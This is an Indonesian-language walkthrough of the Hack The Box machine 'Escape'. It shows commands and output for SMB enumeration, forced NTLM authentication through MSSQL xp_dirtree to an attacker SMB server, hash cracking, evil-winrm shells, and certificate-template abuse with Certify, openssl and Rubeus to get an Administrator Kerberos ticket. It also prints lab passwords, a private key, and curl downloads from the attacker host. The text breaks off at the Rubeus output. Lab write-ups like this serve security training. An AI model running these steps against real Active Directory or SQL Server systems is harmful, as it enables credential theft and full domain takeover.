Escape adalah mesin HTB yang memiliki kesulitan di level sedang dengan point 30 di HTB. Pada eskalasi kami akan menemukan file log yang akan memberi kami kredensial pengguna dan akhirnya kami akan menyalahgunakan template sertifikat untuk mendapatkan hash NTLM dari administrator dengan alat seperti: openssl , Rubeus.exe dan Certify.exe .
Port Scan
nmap --script vuln -sC -sV -Pn 10.10.11.202 -oG allPorts -A
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-08 00:50 EDT
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.11.202
Host is up (0.80s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-05-08 12:51:23Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000
|_tls-ticketbleed: ERROR: Script execution failed (use -d to debug)
| vulners:
| cpe:/a:microsoft:sql_server:2019:
| DF707FE2-EC27-5541-BC6A-6C7A0E9CC454 6.5 https://vulners.com/githubexploit/DF707FE2-EC27-5541-BC6A-6C7A0E9CC454 *EXPLOIT*
| CVE-2021-1636 6.5 https://vulners.com/cve/CVE-2021-1636
| CVE-2022-29143 6.0 https://vulners.com/cve/CVE-2022-29143
| CVE-2023-23384 0.0 https://vulners.com/cve/CVE-2023-23384
| CVE-2023-21718 0.0 https://vulners.com/cve/CVE-2023-21718
| CVE-2023-21713 0.0 https://vulners.com/cve/CVE-2023-21713
| CVE-2023-21705 0.0 https://vulners.com/cve/CVE-2023-21705
| CVE-2023-21704 0.0 https://vulners.com/cve/CVE-2023-21704
|_ CVE-2023-21528 0.0 https://vulners.com/cve/CVE-2023-21528
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 780.09 ms 10.10.16.1
2 780.14 ms 10.10.11.202
Domainnya adalah sequel.htb dan nama hostnya adalah DC . Dari protokol kita dapat melihat:
- Samba
- LDAP
- Kerberos
- Winrm
- Server SQL
- RPC
ip = 10.10.11.202 domain = sequel.htb
Kita dapat menambahkan nama domain ini ke file /etc/hosts
10.10.11.202 sequel.htb dc.sequel.htb
Kami melihat bahwa port samba (445) terbuka dan kami mencoba untuk enumerasi pada port tersebut
┌──(root㉿kali)-[/home/kali]
└─# smbclient -L 10.10.11.202 -N
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Public Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.Kita bisa mengakses folder Public dan didalamnya terdapat file pdf.
┌──(root㉿kali)-[/home/kali]
└─# smbclient //10.10.11.202/Public -N
Try “help” to get a list of possible commands.
smb: \> dir
. D 0 Sat Nov 19 06:51:25 2022
.. D 0 Sat Nov 19 06:51:25 2022
SQL Server Procedures.pdf A 49551 Fri Nov 18 08:39:43 20225184255 blocks of size 4096. 1471578 blocks available
smb: \> Get “SQL Server Procedures.pdf”
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (8.6 KiloBytes/sec) (average 8.6 KiloBytes/sec)
smb: \>Setelah mendownload, kami membacanya untuk melihat isinya. Di halaman pertama kita bisa mendapatkan nama pengguna (brandon.brown) dan menjelaskan cara mengakses server MSSQL.
Di halaman kedua mereka memberi kami nama pengguna dan kata sandi untuk terhubung ke MSSQL.
Kami mencoba mengakses dengan kredensial PDF dan memang valid. Dengan xp_dirtree ( xp_dirtree ‘\\10.10.16.9\content’ ) kami membuat permintaan ke server SMB kami untuk mengautentikasi dan mendapatkan hash NTLMv2.
└─# impacket-mssqlclient sequel.htb/PublicUser:GuestUserCantWrite1@10.10.11.202
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL> help
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
! {cmd} - executes a local shell cmd
SQL> xp_cmdshell
xp_cmdshell
SQL> xp_dirtree
[-] ERROR(): Line 0: Error executing extended stored procedure: Invalid Parameter
SQL> xp_dirtree '\\10.10.16.9\content'
subdirectory depth
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- -----------
SQL>Kami memulai server SMB dengan impacket. dan kami mendapatkan hash dan menyimpannya ke file.
└─# impacket-smbserver $(pwd) . -smb2support
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.11.202,57905)
[*] AUTHENTICATE_MESSAGE (sequel\sql_svc,DC)
[*] User DC\sql_svc authenticated successfully
[*] sql_svc::sequel:aaaaaaaaaaaaaaaa:47e065332ceced3d12ff42677ee328a7:010100000000000000a811365882d9018b93ceaaa2d23afe000000000100100071006d007400710056007300750043000300100071006d00740071005600730075004300020010004d004a00580072005900420073004700040010004d004a005800720059004200730047000700080000a811365882d90106000400020000000800300030000000000000000000000000300000217b549436b5db318fcd1f99538311afad1befb6152e12947053fdc122c659e30a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0039000000000000000000
[*] Closing down connection (10.10.11.202,57905)
[*] Remaining connections []Kami mencoba mengcrack dengan john dan kami berhasil mendapatkan kata sandi “ REGGIE1234ronnie”
┌──(root㉿kali)-[/home/OS-67380]
└─# john — wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press ‘q’ or Ctrl-C to abort, almost any other key for status
REGGIE1234ronnie (sql_svc)
1g 0:00:00:11 DONE (2023–05–09 05:30) 0.08410g/s 899983p/s 899983c/s 899983C/s RENZOJAVIER..REDMAN69
Use the “ — show — format=netntlmv2” options to display all of the cracked passwords reliably
Session completed.Sebelum mencoba terhubung dengan evil-winrm, kami mencari pengguna di domain melalui rcpclient.
┌──(root㉿kali)-[/home/OS-67380]
└─# rpcclient -U “sql_svc” 10.10.11.202
Password for [WORKGROUP\sql_svc]:
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[Tom.Henn] rid:[0x44f]
user:[Brandon.Brown] rid:[0x450]
user:[Ryan.Cooper] rid:[0x451]
user:[sql_svc] rid:[0x452]
user:[James.Roberts] rid:[0x453]
user:[Nicole.Thompson] rid:[0x454]
rpcclient $>Melalui evil-winrm kami terhubung dengan kredensial yang diperoleh.
└─# evil-winrm -i 10.10.11.202 -u sql_svc -p 'REGGIE1234ronnie'
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\sql_svc\Documents> cd ..
*Evil-WinRM* PS C:\Users\sql_svc> cd ..
*Evil-WinRM* PS C:\Users> dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/7/2023 8:58 AM Administrator
d-r--- 7/20/2021 12:23 PM Public
d----- 2/1/2023 6:37 PM Ryan.Cooper
d----- 2/7/2023 8:10 AM sql_svc
*Evil-WinRM* PS C:\Users>Kami menemukan file log ini di folder SQL Server dengan kredensial pengguna lain.
*Evil-WinRM* PS C:\Users> cd /
*Evil-WinRM* PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/1/2023 8:15 PM PerfLogs
d-r--- 2/6/2023 12:08 PM Program Files
d----- 11/19/2022 3:51 AM Program Files (x86)
d----- 11/19/2022 3:51 AM Public
d----- 2/1/2023 1:02 PM SQLServer
d-r--- 2/1/2023 1:55 PM Users
d----- 2/6/2023 7:21 AM Windows
cd *Evil-WinRM* PS C:\> cd SQLServer
*Evil-WinRM* PS C:\SQLServer> dir
Directory: C:\SQLServer
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/7/2023 8:06 AM Logs
d----- 11/18/2022 1:37 PM SQLEXPR_2019
-a---- 11/18/2022 1:35 PM 6379936 sqlexpress.exe
-a---- 11/18/2022 1:36 PM 268090448 SQLEXPR_x64_ENU.exe
*Evil-WinRM* PS C:\SQLServer\Logs> dir
Directory: C:\SQLServer\Logs
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/7/2023 8:06 AM 27608 ERRORLOG.BAK
*Evil-WinRM* PS C:\SQLServer\Logs> Select-String "Password" ERRORLOG.BAK
ERRORLOG.BAK:70:2022-11-18 13:43:06.75 spid18s Password policy update was successful.
ERRORLOG.BAK:112:2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
ERRORLOG.BAK:114:2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
*Evil-WinRM* PS C:\SQLServer\Logs>Disini kita mendapatkan user lain selain yang diatas :
└─# evil-winrm oscarakaelvis/evil-winrm -i 10.10.11.202 -u Ryan.Cooper -p 'NuclearMosquito3'
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> whoami
sequel\ryan.cooper
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> cd ..
*Evil-WinRM* PS C:\Users\Ryan.Cooper> cd Desktop
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> dir
Directory: C:\Users\Ryan.Cooper\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/9/2023 7:55 AM 3846 cert.pem
-a---- 5/9/2023 1:58 PM 3425 cert.pfx
-a---- 5/9/2023 7:35 AM 174080 Certifyyt.exe
-a---- 5/9/2023 7:36 AM 446976 Rubeuss.exe
-ar--- 5/9/2023 7:18 AM 34 user.txt
tyrp*Evil-WinRM* PS C:\Users\Ryan.Cooper\Deskt
type user.txt*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> type user.txt
a7002d95aacdef1b67f217e43bb86f0dKami mencoba mengimpor dan menjalankan alat Sertifikasi untuk menemukan template sertifikat yang rentan .
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> .\Certifyyt.exe find /vulnerable
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'
[*] Listing info about the Enterprise CA 'sequel-DC-CA'
Enterprise CA Name : sequel-DC-CA
DNS Hostname : dc.sequel.htb
FullName : dc.sequel.htb\sequel-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=sequel-DC-CA, DC=sequel, DC=htb
Cert Thumbprint : A263EA89CAFE503BB33513E359747FD262F91A56
Cert Serial : 1EF2FA9A7E6EADAD4F5382F4CE283101
Cert Start Date : 11/18/2022 12:58:46 PM
Cert End Date : 11/18/2121 1:08:46 PM
Cert Chain : CN=sequel-DC-CA,DC=sequel,DC=htb
UserSpecifiedSAN : Disabled
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
Allow ManageCA, ManageCertificates sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Enrollment Agent Restrictions : None
[!] Vulnerable Certificates Templates :
CA Name : dc.sequel.htb\sequel-DC-CA
Template Name : UserAuthentication
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Domain Users S-1-5-21-4078382237-1492182817-2568127209-513
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519Dengan enumerasi dengan “ Certify.exe” menemukan template yang vuln. Selanjut kami mengikutin toturial dari link dibawah ini “ https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-misconfigured-certificate-template-to-domain-admin ”
ini kita dapat memperoleh kunci pribadi dengan mengirimkan data dari template yang Vuln.
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> .\Certifyyt.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:Administrator
.\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /getcrede
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0
[*] Action: Request a Certificates
[*] Current user context : sequel\Ryan.Cooper
[*] No subject name specified, using current context as subject.
[*] Template : UserAuthentication
[*] Subject : CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] AltName : Administrator
[*] Certificate Authority : dc.sequel.htb\sequel-DC-CA
[*] CA Response : The certificate had been issued.
[*] Request ID : 10
[*] cert.pem :
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAz1/6/MnrhBwSBZ5VVwlGN2bifCfCp2YTUHrgqVBRjQ2ibYDm
W5Ys36fYLxP4EpWIoU3HPKT3njF3z+fkrxpbMBTh+0pHDZYG3oHIZWiQgWEqYlI5
5ETZ/i99imQdTnPSqL2b9SNZzxG1PMBW/Iwn3mv+HYie9yeAR7sKJMtumWxcwd3X
oclDOwXgtl165Fzwp7tJRFFcCXje5LCKdn2XO//3yCAD8j3TozbI6cBXUKrQFvrC
qReMjb/7K5iWpwa7IZcWK/lXvWkrYuL+iE20cxaqH9Z+QMvlWfvPLNEKzeBkJPKG
5InUb++Rvpt4pv3TyPV5uZHYMsUxZBlnPcpdCQIDAQABAoIBAQCXD5fJpV1Gsxv9
s8T+zea0XOIHBv+o6ZaQPbKCI9wEIDZ+BjPH67FsitvUD3vaLcuFlR7ZcmJefjKE
5KuVUmGyuMOVRhpUL0F5vJi6Jl19ocY6MSOywOT7YKTWtu8SQxTljpmZDNNTH9ci
FgpHleFFCO3nnaoO6Ftt5TYSb451e0Z2UIMiNo7QTlPLXHqVmkUCuVEhIsL0aAYh
cNao37XLh1NnF7c4wgxe9Z48QuZMCC0eiki+dgjHAzU8r+Gidx6hdAHAPk3doq+3
aWgEVeIkbtrGVh/Ue5R/+QXqtK1pjUgRqpCgzVDGKEW4ZxCoME7UlP4+aLpCjfPV
6oP23PWxAoGBAO+NonQPYYx5chuDnXogQuNEfYEJuRdLIRNH/lB1MmdU9YfI0lp9
Cn1/+s+a/UCxcTNE+aViXgWGDUnQev+sc4indybdUqK+MZpm+Ttay4wm/X5zIGw3
OhhPE3yvvXCDjQ5bCbJUDVz/Y6fIzwXgMt0B88VOkH1OHSKw9nnIMOzXAoGBAN2c
yE31Jk8Nx//VCR0s68WMQwRAwFtxC1tsWsFBrCVldU4CHjQE586BxejIDZGehoC/
8nJczYXCSZa81WZRl3WyX2h+5BASaVJtDaaIh62X9b2A6A7DWNNk4UxQBMfLVHaX
NczjjL0A1PM+gh69x2MdNpWIrO0Y0hBwGBXiYukfAoGBAKc0hR/dXIlge3UY+OI1
gnp/Y9qdnsPTfNKofapLI1NcycRtN+ZRQPE4Uyh1Vi/BqvHOQzJc5qOUXdIX4sJy
7HGF8nT+Jp/RgW30UiJLzaeVz3pjgU4HflVZXJC7Wc8fA2XxxWLjqDAxUq3aTCYd
x2Lb6freS5wq2ctNGb0HLp8hAoGBAM6085zLgk0QlLFLO3IMOWqNFuF7qDBis+41
lj1WjURga1c04Iky3ikfoMMs/oMKM3kaEQGdEFKoU02XmxESH803cIieewmGstig
QbBI/wzrhdqZx1ol2c9r9D3jEWJuhL0M87DFurt8cCTm9CXKbJVFZWl7D5kjoqSU
edLH0+yPAoGAHe6D2swc6ykLpZIZM5ldb3fBL6uhwfspVxHL2GQBQvJj/bLrH02X
8k5mLHnt8Ljjc3lY9lsHH0Gfa7elV2aBu11y0qdTLL4WZxdXOl65J5WI3NquVbRt
XPxwgJbHM2iyA6CRUG1WoRU+hyL1SY0xYIYyqh5rphN9KDXi2ZMoWwc=
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGEjCCBPqgAwIBAgITHgAAAAoi1+tHvjFpGwAAAAAACjANBgkqhkiG9w0BAQsF
ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs
MRUwEwYDVQQDEwxzZXF1ZWwtREMtQ0EwHhcNMjMwNTA5MTQyODU4WhcNMjUwNTA5
MTQzODU4WjBTMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYG
c2VxdWVsMQ4wDAYDVQQDEwVVc2VyczEUMBIGA1UEAxMLUnlhbi5Db29wZXIwggEi
MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDPX/r8yeuEHBIFnlVXCUY3ZuJ8
J8KnZhNQeuCpUFGNDaJtgOZblizfp9gvE/gSlYihTcc8pPeeMXfP5+SvGlswFOH7
SkcNlgbegchlaJCBYSpiUjnkRNn+L32KZB1Oc9KovZv1I1nPEbU8wFb8jCfea/4d
iJ73J4BHuwoky26ZbFzB3dehyUM7BeC2XXrkXPCnu0lEUVwJeN7ksIp2fZc7//fI
IAPyPdOjNsjpwFdQqtAW+sKpF4yNv/srmJanBrshlxYr+Ve9aSti4v6ITbRzFqof
1n5Ay+VZ+88s0QrN4GQk8obkidRv75G+m3im/dPI9Xm5kdgyxTFkGWc9yl0JAgMB
AAGjggLsMIIC6DA9BgkrBgEEAYI3FQcEMDAuBiYrBgEEAYI3FQiHq/N2hdymVof9
lTWDv8NZg4nKNYF338oIhp7sKQIBZAIBBTApBgNVHSUEIjAgBggrBgEFBQcDAgYI
KwYBBQUHAwQGCisGAQQBgjcKAwQwDgYDVR0PAQH/BAQDAgWgMDUGCSsGAQQBgjcV
CgQoMCYwCgYIKwYBBQUHAwIwCgYIKwYBBQUHAwQwDAYKKwYBBAGCNwoDBDBEBgkq
hkiG9w0BCQ8ENzA1MA4GCCqGSIb3DQMCAgIAgDAOBggqhkiG9w0DBAICAIAwBwYF
Kw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFEF6qFM3Fmuinee1R3Z3kvnE1BIo
MCgGA1UdEQQhMB+gHQYKKwYBBAGCNxQCA6APDA1BZG1pbmlzdHJhdG9yMB8GA1Ud
IwQYMBaAFGKfMqOg8Dgg1GDAzW3F+lEwXsMVMIHEBgNVHR8EgbwwgbkwgbaggbOg
gbCGga1sZGFwOi8vL0NOPXNlcXVlbC1EQy1DQSxDTj1kYyxDTj1DRFAsQ049UHVi
bGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlv
bixEQz1zZXF1ZWwsREM9aHRiP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFz
ZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBvQYIKwYBBQUHAQEE
gbAwga0wgaoGCCsGAQUFBzAChoGdbGRhcDovLy9DTj1zZXF1ZWwtREMtQ0EsQ049
QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNv
bmZpZ3VyYXRpb24sREM9c2VxdWVsLERDPWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/
b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0BAQsF
AAOCAQEAQwN7i4MIC43KlaVb+7m9xG3ATqYY0L5G/eFNCUSYvJFNDXyXPA7n+Zwl
bjn8JHMInaMMnjesUUOyNxNdJYiBfuPaeKlnxGZz0WMu93FlTwxPhP3NmcUQhncl
zn2MXU1z3do0pYK42PZc1Lh5+ngq9/orfS9zIUKxObEw3r42wG0zMv4tGof9AAp3
31hhgckbkLgqyfCJO6a8pScGYbTt5rhuUQTn2O9QTyGj5UXcr8NmY8LRfj/HOXb+
gAoqAvrNa6FXLhMWsxq7R7UL+zlzPdJIkNgiFnGIfTS2Vfn5bTanAJ1BbsQ2ZVoC
tS/2moqb0YxQmCdaYU1nlBqsXEt4BQ==
-----END CERTIFICATE-----
[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfxSetelah mendapatkan Cert begin RSA dalam dua file berbeda, cert.pem dan private.key dan melalui openssl kami membuat PFX.
┌──(root㉿kali)-[/home/lovebird]
└─# nano cert.pem
┌──(root㉿kali)-[/home/lovebird]
└─# ls
cert.pem HTBbird.ovpn
┌──(root㉿kali)-[/home/lovebird]
└─# openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password:
Verifying - Enter Export Password:
Verify failure
Can't read Password
4047E3B9797F0000:error:1400006B:UI routines:UI_process:processing error:../crypto/ui/ui_lib.c:544:while reading strings
┌──(root㉿kali)-[/home/lovebird]
└─# openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password:
Verifying - Enter Export Password:
┌──(root㉿kali)-[/home/lovebird]
└─# ls
cert.pem cert.pfxSetelah berhasil membuat file cert.pfx dan kami mendowload file PFX dan alat Rubeus yang akan membantu kami menghasilkan hash NTLM dari administrator.
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> curl 10.10.16.9:8000/cert.pfx -o cert.pfx
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> curl 10.10.16.9/Rubeus.exe -o Rubeuss.exeKami membuat TGT (Ticket Granting Ticket) menggunakan file Rubeus dan PFX untuk mendapatkan hash NTLM dari pengguna administrator.
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> .\Rubeuss.exe asktgt /user:Administrator /password:password /certificate:cert.pfx /getcredentials
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\Administrator'
[*] Using domain controller: fe80::bcdc:f032:f8e4:1054%4:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
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
ServiceName : krbtgt/sequel.htb
